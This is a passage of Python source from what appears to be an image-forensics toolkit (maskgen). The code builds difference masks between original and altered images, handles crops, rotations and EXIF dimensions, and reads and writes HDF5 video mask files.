mask[np.where(mask <= threshold)] = 0 # set to black if less than threshold
mask[np.where(mask > 0)] = 255
mask = mask.astype('uint8')
if algorithm == 'morphology':
mask = cv2.morphologyEx(mask, morphologyOps[morphology_order[0]], kernel)
mask = cv2.morphologyEx(mask, morphologyOps[morphology_order[1]], kernel)
elif algorithm == 'median':
mask = cv2.medianBlur(mask, kernel_size) # filter out noise in the mask
return mask, {'threshold': threshold, 'hist': hist, 'diff':diff}
def getExifDimensionsFromData(exif_meta, crop=False):
heights = ['Cropped Image Height', 'AF Image Height', 'Image Height', 'Exif Image Height', ] if crop else [
'Image Height', 'Exif Image Height']
widths = ['Cropped Image Width', 'AF Image Width', 'Image Width', 'Exif Image Width', ] if crop else ['Image Width',
'Exif Image Width']
height_selections = [(exif_meta[h] if h in exif_meta else None) for h in heights]
width_selections = [(exif_meta[w] if w in exif_meta else None) for w in widths]
if 'png:IHDR.width,height' in exif_meta:
try:
w, h = [int(x.strip()) for x in exif_meta['png:IHDR.width,height'].split(',')]
height_selections.append(h)
width_selections.append(w)
except:
pass
return [(int(height_selections[p]), int(width_selections[p]))
for p in range(len(width_selections)) if
height_selections[p] is not None and width_selections[p] is not None]
def getExifDimensions(filename, crop=False):
from maskgen import exif
return getExifDimensionsFromData(exif.getexif(filename))
def convertCompare(img1, img2, arguments=dict()):
analysis = {}
if 'Image Rotated' in arguments and arguments['Image Rotated'] == 'yes':
if 'source filename' in arguments:
orienation = exif.getOrientationFromExif((arguments['source filename']))
analysis.update(exif.rotateAnalysis(orienation))
img1 = exif.rotateAccordingToExif(img1, orienation,counter=True)
else:
# assumes crop, but this approach should be improved to use HOG comparisons
# since some of these conversions occur with Raw images
rotation, mask = __findRotation(img1, img2, [0, 90, 180, 270])
analysis.update({'rotation': rotation})
return 255 - mask, analysis
if 'source filename' in arguments and img1.shape != img2.shape:
# see if there is crop information in exif
dims_crop = getExifDimensions(arguments['source filename'], crop=True)
dims = getExifDimensions(arguments['source filename'], crop=False)
if len(dims_crop) > 0 and len(dims) > 0 and dims_crop[0] != dims[0]:
analysis['Crop'] = 'yes'
if img1.shape != img2.shape:
diff_shape = (int(img1.shape[0] - img2.shape[0]) / 2, int(img1.shape[1] - img2.shape[1]) / 2)
#keep in mind that alterMask, used for composite generation, assumes 'crop' occurs first, followed
# by final adjustments for size
if 'location' not in arguments:
diff_shape= (max(1,diff_shape[0]),max(1,diff_shape[1]))
else:
diff_shape = toIntTuple(arguments['location'])
if getValue(arguments, 'Crop','yes') == 'no':
new_img1 = img1
else:
new_img1 = img1[diff_shape[0]:-diff_shape[0], diff_shape[1]:-diff_shape[1]]
new_img2 = cv2.resize(img2, (new_img1.shape[1], new_img1.shape[0]))
if getValue(arguments, 'Crop', 'yes') == 'yes':
analysis['location'] = str(diff_shape)
mask, a = __diffMask(new_img1, new_img2, False, args=arguments)
else:
mask, a = __diffMask(img1, img2, False, args=arguments)
analysis.update(a)
return mask, analysis
def __composeMask(img1_wrapper, img2_wrapper, invert, arguments=dict(), alternativeFunction=None, convertFunction=None):
"""
:param img1:
:param img2:
:param invert:
:param arguments:
:param alternativeFunction:
:param convertFunction:
:return:
@type img1_wrapper: ImageWrapper
@type img2_wrapper: ImageWrapper
@type arguments: dict
@rtype numpy.ndarray,dict
"""
img1, img2 = __alignChannels(img1_wrapper,
img2_wrapper,
convertFunction=convertFunction)
args = {}
args.update(arguments)
args['source filename'] = img1_wrapper.filename
args['target filename'] = img2_wrapper.filename
if alternativeFunction is not None:
try:
mask, analysis = alternativeFunction(img1, img2, arguments=args)
removeValue(analysis, 'arguments.source filename')
removeValue(analysis, 'arguments.target filename')
if mask is not None:
return mask if not invert else 255 - mask, analysis, None
except ValueError as e:
logging.getLogger('maskgen').error('Mask generation failure ' + str(e))
logging.getLogger('maskgen').info('Arguments ' + str(arguments))
mask = np.zeros(img1.shape, dtype=np.uint8)
analysis = {}
return abs(255 - mask).astype('uint8') if invert else mask, analysis, str(e)
# rotate image two if possible to compare back to image one.
# The mask is not perfect.
mask = None
error = None
rotation = float(arguments['rotation']) if 'rotation' in arguments else 0.0
analysis = {}
if abs(rotation) > 0.0001:
mask, analysis = __compareRotatedImage(rotation, img1, img2, arguments)
if sum(img1.shape) > sum(img2.shape):
mask, analysis = composeCropImageMask(img1, img2)
if sum(img1.shape) < sum(img2.shape):
mask, analysis = __composeExpandImageMask(img1, img2)
if mask is None:
try:
if img1.shape != img2.shape and \
img1.shape[1] == img2.shape[0] and \
img1.shape[0] == img2.shape[1]:
arguments['Image Rotated'] = 'yes'
mask, analysis = convertCompare(img1, img2, arguments)
else:
mask, analysis = __diffMask(img1, img2, False, args=arguments)
except Exception as e:
logging.getLogger('maskgen').error('Mask generation failure ' + str(e))
logging.getLogger('maskgen').info('Arguments ' + str(arguments))
mask = np.zeros(img1.shape, dtype=np.uint8)
analysis = {}
return abs(255 - mask).astype('uint8') if invert else mask, analysis, error
def __alignShape(im, shape):
x = min(shape[0], im.shape[0])
y = min(shape[1], im.shape[1])
z = np.zeros(shape)
for d in range(min(shape[2], im.shape[2])):
z[0:x, 0:y, d] = im[0:x, 0:y, d]
return z
def __resize(img, dimensions):
if img.shape[0] != dimensions[0]:
diff = abs(img.shape[0] - dimensions[0])
img = np.concatenate((np.zeros((diff / 2, img.shape[1])), img), axis=0)
img = np.concatenate((img, np.zeros((diff - (diff / 2), img.shape[1]))), axis=0)
if img.shape[1] != dimensions[1]:
diff = abs(img.shape[1] - dimensions[1])
img = np.concatenate((np.zeros((img.shape[0], diff / 2)), img), axis=1)
img = np.concatenate((img, np.zeros((img.shape[0], diff - (diff / 2)))), axis=1)
return img
def rotateImage(angle, pivot, img):
padX = [img.shape[1] - pivot[1], pivot[1]]
padY = [img.shape[0] - pivot[0], pivot[0]]
imgP = np.pad(img, [padY, padX], 'constant')
if abs(angle) % 90 == 0:
imgR = np.rot90(imgP, int(angle / 90)).astype('uint8')
else:
try:
imgR = np.asarray(Image.fromarray(imgP).rotate(angle))
except:
imgR = ndimage.rotate(imgP, angle, cval=0, reshape=False, mode='constant').astype('uint8')
return imgR[padY[0]: -padY[1], padX[0]: -padX[1]]
def __localrotateImage(rotation, mask, img, expectedDims=None, cval=0):
maskInverted = ImageWrapper(np.asarray(mask)).invert().to_array()
maskInverted[maskInverted > 0] = 1
targetDims = img.shape
if expectedDims is not None:
targetDims = expectedDims
x0,y0,w,h = widthandheight(maskInverted)
if w == 0 or h == 0:
return img
h = min(h+1, targetDims[0])
w = min(w+1, targetDims[1])
subImg = img[y0:(y0+h),x0:(x0+w)]
center = (h /2, w / 2)
M = cv2.getRotationMatrix2D(center, rotation, 1.0)
rotatedSubMask = cv2.warpAffine(subImg*maskInverted[y0:(y0+h),x0:(x0+w)], M, (w,h),flags=cv2api.cv2api_delegate.inter_linear)
rotatedMask = np.zeros(mask.shape)
rotatedMask[y0:y0+h,x0:x0+w] = rotatedSubMask
maskAltered = np.copy(mask)
maskAltered[maskAltered > 0] = 1
return (rotatedMask + img * maskAltered).astype('uint8')
def __rotateImage(rotation, img, expectedDims=None, cval=0):
expectedDims = expectedDims if expectedDims is not None else (img.shape[0], img.shape[1])
rotNorm = int(rotation / 90) if (rotation % 90) == 0 else None
rotNorm = rotNorm if rotNorm is None or rotNorm >= 0 else (4 + rotNorm)
npRotation = rotNorm is not None and img.shape == (expectedDims[1], expectedDims[0])
if npRotation:
res = np.rot90(img, rotNorm)
else:
res = ndimage.interpolation.rotate(img, rotation, cval=cval, reshape=(img.shape != expectedDims), order=0)
if (res.shape[0],res.shape[1]) != expectedDims:
res = cv2.resize(res,(expectedDims[1],expectedDims[0]))
return res
def __compareRotatedImage(rotation, img1, img2, arguments):
if rotation != 0:
res = __rotateImage(rotation, img1, expectedDims=img2.shape, cval=img2[0, 0])
else:
res = img1
mask, analysis = __composeExpandImageMask(res, img2) if res.shape != img2.shape else __diffMask(res,
img2,
False,
args=arguments)
if rotation != 0:
res = __rotateImage(-rotation, mask, expectedDims=img1.shape, cval=255)
else:
res = mask
return res, analysis
def __findRotation(img1, img2, range):
best = 0
r = None
best_mask = None
for rotation in range:
res, analysis = __compareRotatedImage(rotation, img1, img2, {})
c = np.sum(res)
if c > best or best_mask is None:
best = c
best_mask = res
r = rotation
return r, best_mask
# res = __resize(mask,(max(img2.shape[0],img1.shape[0]), max(img2.shape[1],img1.shape[1])))
# res[res<0.00001] = 0
# res[res>0] = 255
# # now crop out the rotation difference, to make sure the original image is not modified
# if img1.shape != res.shape:
# diff = (res.shape[0]-img1.shape[0], res.shape[1]-img1.shape[1])
# diff = (diff[0] if diff[0] > 0 else 0, diff[1] if diff[1] > 0 else 0)
# res = res[diff[0]/2:res.shape[0]-((diff[0]/2) -diff[0]),diff[1]/2:res.shape[1]-((diff[1]/2) - diff[1])]
def extractAlpha(rawimg1, rawimg2):
"""
If rawimg2 has an alpha channel, then the pixels then the high alpha value is the pixels that did not change
:param rawimg1:
:param rawimg2:
:return:
"""
img2_array = rawimg2.to_array()
img1_array = rawimg1.to_array()
ii16 = np.iinfo(np.uint16)
if len(img2_array.shape) == 3 and img2_array.shape[2] == 4:
img2_array = img2_array[:, :, 3]
if len(img2_array.shape) == 2:
all = np.zeros((img2_array.shape[0], img2_array.shape[1])).astype('uint16')
all[img2_array == 0] = ii16.max
return np.zeros((img1_array.shape[0], img1_array.shape[1])).astype('uint16'), all
return rawimg1.to_16BitGray().to_array(), rawimg2.to_16BitGray().to_array()
def convert16bitcolor(rawimg1, rawimg2):
return rawimg1.to_array().astype('int16'), rawimg2.to_array().astype('int16')
def __alignChannels(rawimg1, rawimg2, convertFunction=None):
"""
:param rawimg1:
:param rawimg2:
:param equalize_colors:
:return:
@type rawimg1: ImageWrapper
@type rawimg2: ImageWrapper
"""
if convertFunction is not None:
return convertFunction(rawimg1, rawimg2)
return rawimg1.to_16BitGray().to_array(), rawimg2.to_16BitGray().to_array()
def __findBestMatch(big, small):
""" Return a tuple describing the bounding box (xl,xh,yl,yh) with the most
likely match to the small image.
"""
if len(small.shape) == 3 and len(big.shape) == 3 and \
small.shape[2] == 4 and big.shape[2] == 3:
newsmall = np.zeros((small.shape[0], small.shape[1], 3))
newsmall[:, :, :] = small[:, :, 0:3]
small = newsmall
if np.any(np.asarray([(x[1] - x[0]) for x in zip(small.shape, big.shape)]) < 0):
return None
result = cv2.matchTemplate(big.astype('float32'), small.astype('float32'), cv2api.cv2api_delegate.tm_sqdiff_normed)
mn, _, mnLoc, _ = cv2.minMaxLoc(result)
result_tuple = (mnLoc[1], mnLoc[0], mnLoc[1] + small.shape[0], mnLoc[0] + small.shape[1])
if result_tuple[2] > big.shape[0] or result_tuple[3] > big.shape[1]:
return None
return result_tuple
def bm(X, patch):
from sklearn.metrics import mean_absolute_error
bv = 999999.0
bp = (0, 0)
for i in range(X.shape[0] - patch.shape[0]):
for j in range(X.shape[1] - patch.shape[1]):
v = mean_absolute_error(X[i:i + patch.shape[0], j:j + patch.shape[1]], patch)
if v < bv:
bv = v
bp = (i, j)
return bp, bv
def composeCropImageMask(img1, img2, location=None):
""" Return a masking where img1 is bigger than img2 and
img2 is likely a crop of img1.
images are 16 bit unnsigned or floating point.
@return change mask aligned to in img1 dimensions, dictionary of analysis keys
@type img1: np.array
@type img2: np.array
"""
analysis = {}
analysis['location'] = '(0,0)'
if location is not None:
matched_tuple = (location[0],location[1],img2.shape[0]+location[0],img2.shape[1]+location[1])
else:
matched_tuple = __findBestMatch(img1, img2)
if matched_tuple is not None:
diffIm = np.zeros(img1.shape).astype(img1.dtype)
diffIm[matched_tuple[0]:matched_tuple[2], matched_tuple[1]:matched_tuple[3]] = img2
analysis['location'] = str((int(matched_tuple[0]), int(matched_tuple[1])))
dst = np.abs(img1 - diffIm)
gray_image = np.zeros(img1.shape).astype('uint8')
gray_image[dst > 0.0001] = 255
mask = gray_image
for k, v in img_analytics(img1, diffIm, mask=mask).iteritems():
analysis[k] = v
else:
mask = np.ones(img1.shape) * 255
return abs(255 - mask).astype('uint8'), analysis
def composeCloneMask(changemask, startimage, finalimage):
"""
:param changemask:
:param startimage:
:param finalimage:
:return:
@type changemask: ImageWrapper
@type startimage: ImageWrapper
@type finalimage: ImageWrapper
"""
mask = np.asarray(changemask.invert())
start_image_array = np.array(startimage)
final_image_array = np.array(finalimage)
newmask = np.zeros(start_image_array.shape).astype('uint8')
try:
contours, hierarchy = cv2api.findContours(np.copy(mask), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
for i in range(0, len(contours)):
try:
cnt = contours[i]
x, y, w, h = cv2.boundingRect(cnt)
if w <= 2 or h <= 2:
continue
final_image_subarray = final_image_array[y:y + h, x:x + w]
for i in range(final_image_subarray.shape[2]):
final_image_subarray[:, :, i] = final_image_subarray[:, :, i] * (mask[y:y + h, x:x + w] / 255)
matched_tuple = __findBestMatch(start_image_array, final_image_subarray)
if matched_tuple is not None:
newmask[matched_tuple[0]:matched_tuple[2], matched_tuple[1]:matched_tuple[3]] = 255
except Exception as e:
logging.getLogger('maskgen').warning('Failed to compose clone mask: ' + str(e))
continue
except Exception as e:
return changemask.to_array()
return newmask
def __composeExpandImageMask(img1, img2):
""" Return a masking where img1 is smaller than img2 and
img2 contains img1.
"""
matched_tuple = __findBestMatch(img2, img1)
analysis = {}
if matched_tuple is not None:
diffIm = img2[matched_tuple[0]:matched_tuple[2], matched_tuple[1]:matched_tuple[3]]
dst = np.abs(img1 - diffIm)
analysis['location'] = str((int(matched_tuple[0]), int(matched_tuple[1])))
gray_image = np.zeros(img1.shape).astype('uint8')
gray_image[dst > 0.0001] = 255
mask = gray_image
for k, v in img_analytics(img1, diffIm, mask=mask).iteritems():
analysis[k] = v
else:
mask = np.ones(img1.shape) * 255
return abs(255 - mask).astype('uint8'), analysis
def __colorPSNR(z1, z2, size=None):
if size == 0:
return 0.0
d = (z1 - z2) ** 2
sse = np.sum(d)
size = float(reduce(lambda x, y: x * y, d.shape)) if size is None else float(size)
mse = float(sse) / size
return 0.0 if mse == 0.0 else 20.0 * math.log10(255.0 / math.sqrt(mse))
def sizeDiff(z1, z2):
"""
z1 and z2 are expected to be PIL images
"""
# size is inverted due to Image's opposite of numpy arrays
return str((int(z2.size[1] - z1.size[1]), int(z2.size[0] - z1.size[0])))
def invertMask(mask):
return mask.invert()
def convertToMask(im):
"""
Takes an image and produce a mask where all black areas are white
"""
return im.to_mask()
def __checkInterpolation(val):
validVals = ['nearest', 'lanczos', 'bilinear', 'bicubic' or 'cubic']
return val if val in validVals else 'nearest'
def applyMask(image, mask, value=0):
if mask.shape != image.shape:
mask = cv2.resize(mask, (image.shape[1], image.shape[0]))
image = np.copy(image)
image[mask == 0] = value
return image
def carveMask(image, mask, expectedSize):
"""
Trim a mask after seam carving
:param image:
:param mask:
:param expectedSize:
:return:
"""
newimage = np.zeros(expectedSize).astype('uint8')
if expectedSize[0] == mask.shape[0]:
for x in range(expectedSize[0]):
topaste = image[x, mask[x, :] == 255]
if (len(topaste)) <= newimage.shape[1]:
newimage[x, 0:len(topaste)] = topaste
else:
newimage[x, :] = topaste[0:len(topaste)]
elif expectedSize[1] == mask.shape[1]:
for y in range(expectedSize[1]):
topaste = image[mask[:, y] == 255, y]
if (len(topaste)) <= newimage.shape[0]:
newimage[0:len(topaste), y] = topaste
else:
newimage[:, y] = topaste[0:len(topaste)]
else:
return applyMask(image, mask)
return newimage
def alterMask(compositeMask,
edgeMask,
rotation=0.0,
targetShape=(0, 0),
interpolation='nearest',
location=(0, 0),
transformMatrix=None,
flip=None,
crop=False,
cut=False):
res = compositeMask
# rotation may change the shape
# transforms typical are created for local operations (not entire image)
if location != (0, 0) or crop:
if targetShape != res.shape:
# inverse crop
newRes = np.zeros(targetShape).astype('uint8')
upperBound = (min(res.shape[0] + location[0], newRes.shape[0]),
min(res.shape[1] + location[1], newRes.shape[0]))
newRes[location[0]:upperBound[0], location[1]:upperBound[1]] = res[0:(upperBound[0] - location[0]),
0:(upperBound[1] - location[1])]
res = newRes
else:
upperBound = (min(res.shape[0], targetShape[0] + location[0]),
min(res.shape[1], targetShape[1] + location[1]))
res = res[location[0]:upperBound[0], location[1]:upperBound[1]]
if transformMatrix is not None and not cut and flip is None:
res = applyTransformToComposite(compositeMask, edgeMask, transformMatrix)
elif abs(rotation) > 0.001:
if targetShape != res.shape or abs(rotation) % 90 < 0.001:
res = __rotateImage(rotation, compositeMask,
expectedDims=targetShape,
cval=0)
else:
res = applyRotateToComposite(rotation, res,
edgeMask,
targetShape)
# if transform matrix provided and alternate path is taken above
if flip is not None:
res = applyFlipComposite(res, edgeMask, flip)
if cut:
res = applyMask(res, edgeMask)
if targetShape != res.shape:
res = applyResizeComposite(res, targetShape)
return res
def alterReverseMask(donorMask, edgeMask, rotation=0.0, location=(0, 0),
transformMatrix=None, flip=None, crop=False, cut=False, targetShape=None):
res = donorMask
# if we are cutting, then do not want to use the edge mask as mask for transformation.
# see the cut section below, where the transform occurs directly on the mask
# this occurs in donor cases
if ((location != (0, 0) or crop) and not cut):
if targetShape != donorMask.shape:
# inverse crop
upperBound = (min(res.shape[0], targetShape[0] + location[0]),
min(res.shape[1], targetShape[1] + location[1]))
res = res[location[0]:upperBound[0], location[1]:upperBound[1]]
else:
newRes = np.zeros(targetShape).astype('uint8')
upperBound = (res.shape[0] + location[0], res.shape[1] + location[1])
newRes[location[0]:upperBound[0], location[1]:upperBound[1]] = res[0:(upperBound[0] - location[0]),
0:(upperBound[1] - location[1])]
res = newRes
if transformMatrix is not None and not cut and flip is None:
res = applyTransform(res, mask=edgeMask, transform_matrix=transformMatrix, invert=True,
returnRaw=False)
elif abs(rotation) > 0.001:
res = __rotateImage(-rotation, res, expectedDims=targetShape, cval=0)
elif flip is not None:
res = applyFlipComposite(res, edgeMask, flip)
if cut:
# res is the donor mask
# edgeMask may be the overriding mask from a PasteSplice, thus in the same shape
# The transfrom will convert to the target mask size of the donor path.
res = applyMask(res, edgeMask)
if transformMatrix is not None:
res = cv2.warpPerspective(res, transformMatrix, (targetShape[1], targetShape[0]),
flags=cv2.WARP_INVERSE_MAP,
borderMode=cv2.BORDER_CONSTANT, borderValue=0).astype('uint8')
# need to use target size since the expected does ot align with the donor paths.
if targetShape != res.shape:
res = cv2.resize(res, (targetShape[1], targetShape[0]))
return res
def __toMask(im):
"""
Performs same functionality as convertToMask, but takes and returns np array
"""
if len(im.shape) < 3:
return im
imGray = cv2.cvtColor(im, cv2.COLOR_RGB2GRAY)
gray_image = np.ones(imGray.shape).astype('uint8')
gray_image[imGray < 255] = 0
gray_image *= 255
if im.shape[2] == 4:
gray_image[im[:, :, 3] == 0] = 255
return gray_image
def mergeColorMask(compositeMaskArray, newMaskArray):
matches = np.any(newMaskArray != [255, 255, 255], axis=2)
compositeMaskArray[matches] = newMaskArray[matches]
return compositeMaskArray
def mergeMask(compositeMask, newMask, level=0):
if compositeMask.shape != newMask.shape:
compositeMask = cv2.resize(compositeMask, (newMask.shape[1], newMask.shape[0]))
newMask = ImageWrapper(newMask).to_mask().to_array()
else:
compositeMask = np.copy(compositeMask)
compositeMask[newMask == 0] = level
return compositeMask
def ssim(X, Y, MASK, **kwargs):
from scipy.ndimage import gaussian_filter
K1 = kwargs.pop('K1', 0.01)
R = kwargs.pop('R', 255)
K2 = kwargs.pop('K2', 0.03)
sigma = kwargs.pop('sigma', 1.5)
X = X.astype(np.float64)
Y = Y.astype(np.float64)
win_size = 1
cov_norm = 1.0 # population covariance to match Wang et. al. 2004
filter_func = gaussian_filter
filter_args = {'sigma': sigma}
# compute (weighted) means
ux = filter_func(X, **filter_args)
uy = filter_func(Y, **filter_args)
# compute (weighted) variances and covariances
uxx = filter_func(X * X, **filter_args)
uyy = filter_func(Y * Y, **filter_args)
uxy = filter_func(X * Y, **filter_args)
vx = cov_norm * (uxx - ux * ux)
vy = cov_norm * (uyy - uy * uy)
vxy = cov_norm * (uxy - ux * uy)
C1 = (K1 * R) ** 2
C2 = (K2 * R) ** 2
A1, A2, B1, B2 = ((2 * ux * uy + C1,
2 * vxy + C2,
ux ** 2 + uy ** 2 + C1,
vx + vy + C2))
D = B1 * B2
S = ((A1 * A2) / D) * MASK
# compute (weighted) mean of ssim
return S.mean()
def img_analytics(z1, z2, mask=None):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
result = {'psnr': __colorPSNR(z1, z2)}
if mask is not None:
mask = np.copy(mask)
mask[mask > 0] = 1
result.update({'local psnr': __colorPSNR(z1 * mask, z2 * mask, size=sumMask(mask))})
return result
def __diffMask(img1, img2, invert, args=None):
itype = np.iinfo(img1.dtype)
dst = np.abs(np.subtract(img1.astype('int32'), img2.astype('int32')))
gray_image = np.zeros(img1.shape).astype('uint8')
difference = float(args['tolerance']) if args is not None and 'tolerance' in args else 0.0001
difference = difference * (itype.max - itype.min)
gray_image[dst > difference] = 255
analysis = img_analytics(img1, img2, mask=gray_image)
return (gray_image if invert else (255 - gray_image)), analysis
def coordsFromString(value):
import re
value = re.sub('[\(\)\,]', ' ', value)
vals = [int(float(v)) for v in value.split(' ') if v != ' ' and v != '']
return tuple(vals)
def fixTransparency(img):
return img.apply_transparency()
def dictDeepUpdate(aDictionary, aPartialDictionary):
for k, v in aPartialDictionary.iteritems():
if k in aDictionary and type(v) == dict:
dictDeepUpdate(aDictionary[k], v)
else:
aDictionary[k] = v
def grayToRGB(frame):
"""
project gray into Green
"""
result = np.zeros((frame.shape[0], frame.shape[1], 3))
if len(frame.shape) == 2:
result[:, :, 1] = frame
else:
summary = np.zeros((frame.shape[0], frame.shape[1]))
for d in range(frame.shape[2]):
summary[:, :] += frame[:, :, d]
summary[summary > 0] = 255
result[:, :, 1] = summary
return result.astype('uint8')
def composeVideoMaskName(maskprefix, starttime, suffix):
"""
:param maskprefix:
:param starttime:
:param suffix:
:return: A mask file name using the provided components
"""
if maskprefix.endswith('_mask_' + str(starttime)):
return maskprefix + '.' + suffix
return maskprefix + '_mask_' + str(starttime) + '.' + suffix
def convertToVideo(filename, preferences=None, start_frame=None, start_time=0):
suffix = '.' + preferredSuffix(preferences=preferences)
fn = os.path.splitext(filename)[0] + (str(start_frame) if start_frame is not None else '') + suffix
if os.path.exists(fn):
if os.stat(filename).st_mtime < os.stat(fn).st_mtime:
return fn
else:
os.remove(fn)
reader = GrayBlockReader(filename,
convert=True,
preferences=preferences,
start_frame=start_frame,
start_time=start_time)
while True:
mask = reader.read()
if mask is None:
break
fn = reader.writer.filename
return fn
executions = {}
def cancel_execute(worker_func):
if worker_func in executions:
executions[worker_func].cancel()
def execute_every(interval, worker_func, start=True, **kwargs):
executions[worker_func] = threading.Timer(
interval,
execute_every, [interval, worker_func, False], kwargs)
executions[worker_func].start()
if not start:
worker_func(**kwargs)
class GrayBlockFrameFirstLayout():
name = 'framefirst'
@staticmethod
def is_end(reader):
return reader.pos >= reader.dset.shape[0]
@staticmethod
def count(reader):
return reader.dset.shape[0]
@staticmethod
def get_frame(reader):
return reader.dset[reader.pos]
@staticmethod
def initial_shape(shape, size = None):
return (size,) + shape
@staticmethod
def resize(shape, writer):
if writer.dset.shape[0] < (writer.pos + 1):
writer.dset.resize((writer.pos + 1,) + writer.dset.shape[1:])
@staticmethod
def set(writer,mask):
writer.dset[ writer.pos] = mask
class GrayBlockFrameLastLayout():
name = 'framelast'
@staticmethod
def is_end(reader):
return reader.pos >= reader.dset.shape[-1]
@staticmethod
def count(reader):
return reader.dset.shape[-1]
@staticmethod
def get_frame(reader):
return reader.dset[:, :, reader.pos]
@staticmethod
def initial_shape(shape, size=None):
return (shape)[:-1] + (size,)
@staticmethod
def resize(shape, writer):
if writer.dset.shape[-1] < (writer.pos + 1):
writer.dset.resize((shape)[:-1] + (writer.pos + 1,))
@staticmethod
def set(writer,mask):
if len(writer.dset.shape) == 2:
writer.dset[:, :, writer.pos] = mask
else:
writer.dset[:, :, :, writer.pos] = mask
class GrayBlockReader:
def __init__(self, filename,
convert=False,
preferences=None,
start_time=0,
start_frame=None,
end_frame=None):
import h5py
self.writer = None
self.start_frame = start_frame
self.start_time = start_time
self.preferences = preferences
self.filename = filename
self.h_file = h5py.File(filename, 'r')
grp_names = self.h_file.keys()
if 'masks' in grp_names:
self.grps = ['masks']
self.setter = OldFormatGroupSetter()
else:
self.setter = NewFormatGroupSetter()
self.grps = [str(x) for x in sorted([int(x) for x in grp_names])]
# group selection
self.grp_pos = 0
# frame selection in group (relative to start of group)
self.pos = 0
# the smart numpy array
self.dset = None
# where to stop
self.end_frame = end_frame
self.fps = self.h_file.attrs['fps']
self.mask_format = MASKFORMATS[
self.h_file.attrs['mask_format'] if 'mask_format' in self.h_file.attrs else GrayBlockFrameFirstLayout.name]
self.setter.set_group(self, start_time=start_time, start_frame=start_frame, end_frame=end_frame)
self.convert = convert
self.writer = GrayFrameWriter(os.path.splitext(filename)[0],
self.fps,
preferences=preferences) if self.convert else DummyWriter()
def create_writer(self):
"""
:return:
@rtype: GrayBlockWriter
"""
import time
dir = os.path.dirname(self.filename)
prefix = os.path.join(dir,os.path.basename(self.h_file.attrs['prefix'])) if 'prefix' in self.h_file.attrs else os.path.splitext(self.filename)[0][:48]
return GrayBlockWriter(prefix + str(time.clock()), self.fps)
def set_group(self, start_frame=None, start_time=1, end_frame=None):
self.setter.set_group(self, start_frame=start_frame,start_time=start_time, end_frame=end_frame)
def current_frame_time(self):
return self.start_time + (self.pos * (1000 / self.fps))
def current_frame(self):
return self.start_frame + self.pos
def length(self):
return self.mask_format.count(self)
def read(self):
if self.dset is None:
return None
if self.end_frame is not None and self.current_frame() == self.end_frame + 1:
return None
if self.mask_format.is_end(self):
self.grp_pos+=1
if self.grp_pos < len(self.grps):
self.setter.select_group(self, self.grp_pos)
else:
self.dset = None
return None
mask = self.mask_format.get_frame(self)
mask = mask.astype('uint8')
self.writer.write(mask, self.start_frame + self.pos, self.current_frame_time())
self.pos += 1
return mask
def release(self):
pass
def close(self):
self.h_file.close()
if self.writer is not None:
self.writer.close()
MASKFORMATS = {GrayBlockFrameFirstLayout.name:GrayBlockFrameFirstLayout(),
GrayBlockFrameLastLayout.name:GrayBlockFrameLastLayout()}
class GrayBlockReaderManager:
def __init__(self, reader_type= GrayBlockReader):
self.reader_type = reader_type
self.reader = None
self.filename = None
def create_reader(self, filename,
start_frame=None,
start_time=0,
end_frame=None):
"""
:param filename:
:param start_frame:
:param start_time:
:param end_frame: optional stopping point
:return:
@type filename: str
@rtype: GrayBlockReader
"""
if filename == self.filename:
self.reader.set_group(start_frame=start_frame,
start_time=start_time,
end_frame=end_frame)
else:
if self.reader is not None:
self.reader.close()
self.filename = filename
self.reader = self.reader_type(filename,
start_frame=start_frame,
start_time=start_time,
end_frame=end_frame)
return self.reader
def close(self):
if self.reader is not None:
self.reader.close()
self.reader = None
class GrayBlockWriterManager:
def __init__(self):
self.writer = None
def create_writer(self, reader):
"""
:param reader:
:return:
@type reader: GrayBlockReader
@rtype: GrayBlockWriter
"""
if self.writer is not None:
return self.writer
self.writer= reader.create_writer()
return self.writer
def close(self):
if self.writer is not None:
self.writer.close()
self.writer = None
class NewFormatGroupSetter:
"""
Multiple Mask Segment per HDF5 File, one in each group.
"""
@staticmethod
def set_group(reader, start_frame=None, start_time=1,end_frame=None):
"""
:param start_frame:
:param start_time:
:return:
@type reader: GrayBlockReader
"""
grp_pos = 0
if start_frame is not None:
pos = len([x for x in reader.grps if int(x) <= start_frame]) - 1
grp_pos = pos if pos > 0 else grp_pos
NewFormatGroupSetter.select_group(reader,
grp_pos,
start_frame=start_frame,
start_time=start_time,
end_frame=end_frame)
@staticmethod
def select_group(reader,
grp_pos,
start_frame=None,
start_time=0,
end_frame=None):
"""
:param reader:
:param grp_no:
:param start_frame:
:param start_time:
:param end_frame: determine end frame
:return:
"""
reader.grp_pos = grp_pos
reader.current_group = reader.h_file.get(reader.grps[grp_pos])
reader.dset = reader.current_group.get('masks')
reader.start_time = reader.current_group.attrs[
'start_time'] if 'start_time' in reader.current_group.attrs else start_time
reader.start_frame = reader.current_group.attrs[
'start_frame'] if 'start_frame' in reader.current_group.attrs else start_frame
end_frame = reader.current_group.attrs[
'end_frame'] if 'end_frame' in reader.current_group.attrs and end_frame is None else end_frame
reader.end_frame = end_frame if end_frame is not None else None
reader.pos = 0 if start_frame is None else reader.start_frame - start_frame
class OldFormatGroupSetter:
"""
One Mask Segment per HDF5 File.
"""
@staticmethod
def set_group(reader, start_frame=None, start_time=0, end_frame=None):
"""
:param start_frame:
:param start_time:
:return:
@type reader: GrayBlockReader
"""
reader.current_group = reader.h_file.get('masks')
reader.dset = reader.current_group.get('masks')
reader.start_time = reader.h_file.attrs[
'start_time'] if 'start_time' in reader.h_file.attrs else start_time
reader.start_frame = reader.h_file.attrs[
'start_frame'] if 'start_frame' in reader.h_file.attrs else start_frame
reader.pos = 0 if start_frame is None else reader.start_frame - start_frame
@staticmethod
def select_group(reader, grp_pos, start_frame=None, start_time=0,end_frame=None):
OldFormatGroupSetter.set_group(reader,start_frame=start_frame,start_time=start_time)
def compose_overlay_name(target_file="", link = tuple()):
path_tuple = os.path.split(target_file)
return os.path.join(path_tuple[0], path_tuple[1] + str(hash(link))[:5] + '_overlay.' + preferredSuffix())
class GrayBlockOverlayGenerator:
def __init__(self, locator, segments = [], target_file = None, output_file = ""):
from video_tools import get_frames_from_segment
self.target_file = target_file
self.output_file = output_file
segments = [segment for segment in segments if segment.media_type == 'video' and segment.filename != None]
self.segments = sorted(segments, key=lambda segment: segment.startframe)
self.segment_index = 0
self.segment = segments[self.segment_index]
self.readerManager = GrayBlockReaderManager()
self.reader = self.readerManager.create_reader(
filename=self.segment.filename,
start_time=self.segment.starttime,
start_frame=self.segment.startframe,
